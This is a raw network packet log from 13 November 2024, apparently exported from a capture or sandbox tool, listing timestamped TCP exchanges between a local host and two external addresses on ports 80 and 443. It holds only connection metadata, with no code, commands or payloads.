Nov 13, 2024 20:39:46.493988037 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.494045973 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.494066000 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.494083881 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.494107962 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.494119883 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.517071009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.517132044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.517232895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.517242908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.517277956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.517313957 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.517366886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.517415047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.538885117 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.538960934 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.538986921 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.539000988 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.539030075 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.539043903 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.580353022 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.580849886 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.580965996 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.581002951 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.581017971 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.581029892 CET	49910	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.581033945 CET	443	49910	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.584443092 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.584520102 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.584608078 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.584795952 CET	49914	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.584827900 CET	443	49914	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.594059944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594074011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594135046 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.594218016 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594257116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.594397068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594408035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594419003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594444036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.594461918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.594743013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594753981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594764948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.594794035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.594815016 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.595073938 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.595129967 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.595951080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.595998049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.610284090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.610300064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.610308886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.610316992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.610327005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.610337973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.610363960 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.610394001 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.625854015 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.626415968 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.626494884 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.626775980 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.626792908 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.634082079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.634146929 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.634253979 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.634263992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.634303093 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.634421110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.634433985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.634502888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.634502888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.652529955 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.652600050 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.652637959 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.652671099 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.652708054 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.652730942 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.692655087 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.693150043 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.693214893 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.693679094 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.693694115 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.709589005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.709645987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.709651947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.709677935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.709693909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.709719896 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.709763050 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.709774971 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.709810019 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.710079908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.710092068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.710103989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.710114002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.710134983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.710151911 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.724705935 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.724772930 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.724814892 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.724883080 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.724917889 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.725183010 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.725249052 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.725610971 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.725624084 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.726191998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726217031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726227045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726246119 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.726253033 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.726258993 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.726294994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.726322889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726334095 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726378918 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.726563931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726613045 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.726615906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726628065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.726670027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.754751921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.754792929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.754803896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.754837036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.754848957 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.754950047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.754950047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.754950047 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.754951000 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.758141994 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.758220911 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.758402109 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.758450031 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.758450031 CET	49912	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.758472919 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.758486986 CET	443	49912	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.761059999 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.761120081 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.761228085 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.761487007 CET	49915	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.761518955 CET	443	49915	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.810384035 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.810417891 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.810489893 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.810512066 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.810539007 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.810559988 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.825995922 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.826042891 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.826103926 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.826172113 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.826333046 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.826333046 CET	49913	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.826370955 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.826395035 CET	443	49913	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.826622963 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.826636076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.826646090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.826702118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.826702118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.826805115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.826817989 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.826828003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.826862097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.826895952 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.827142000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.827195883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.827205896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.827249050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.827280045 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.829226971 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.829288006 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.829431057 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.829612970 CET	49916	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.829653978 CET	443	49916	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.842468977 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.842533112 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.842550993 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.842566013 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.842597961 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.842664957 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.843530893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843543053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843555927 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843568087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843580008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843592882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843610048 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.843647957 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.843647957 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.843869925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.843940020 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.845515013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.845576048 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.857829094 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.857893944 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.858011007 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.858851910 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.858851910 CET	49911	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.858869076 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.858880997 CET	443	49911	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.861022949 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.861053944 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.861182928 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.861325979 CET	49917	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.861337900 CET	443	49917	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.866734028 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.866807938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.866816998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.866956949 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.872004986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.872076988 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.872170925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.872184038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.872195005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.872220039 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.872243881 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.943734884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.943748951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.943758965 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.943808079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.943845034 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.943869114 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.943881035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.943891048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.944063902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.944063902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.944212914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.944224119 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.944233894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.944266081 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.944303036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.955357075 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.955420017 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.955459118 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.955501080 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.955590963 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.955630064 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.958971977 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.959064007 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.959069014 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.959111929 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.959124088 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.959125042 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.959182978 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.959655046 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:46.959661007 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:46.960959911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.960972071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.960982084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.960995913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961045027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.961077929 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.961121082 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961170912 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.961353064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961364031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961374044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961401939 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.961429119 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.961569071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961580038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.961622953 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.961648941 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.990566015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.990591049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.990603924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.990616083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.990631104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.990636110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.990636110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.990681887 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:46.991106033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.991122961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:46.991161108 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.060872078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.060885906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.060898066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.060909986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.060921907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.060976982 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.061058998 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.061229944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.061243057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.061259985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.061300993 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.061301947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.078128099 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.078140020 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.078149080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.078161955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.078172922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.078183889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.078402042 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.080590010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.080601931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.080612898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.080715895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.107762098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.107777119 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.107789993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.107801914 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.107815981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.107830048 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.107860088 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.108877897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.108890057 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.108901024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.108911037 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.108925104 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.108963966 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.156008959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.156022072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.156081915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.178107023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178119898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178129911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178142071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178153038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178193092 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.178203106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178214073 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.178215981 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.178251028 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.195096970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195146084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195158005 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195235014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.195341110 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195353985 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195365906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195395947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.195414066 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:47.195787907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195800066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195832014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:47.195844889 CET	80	49873	185.215.113.206	192.168.2.5
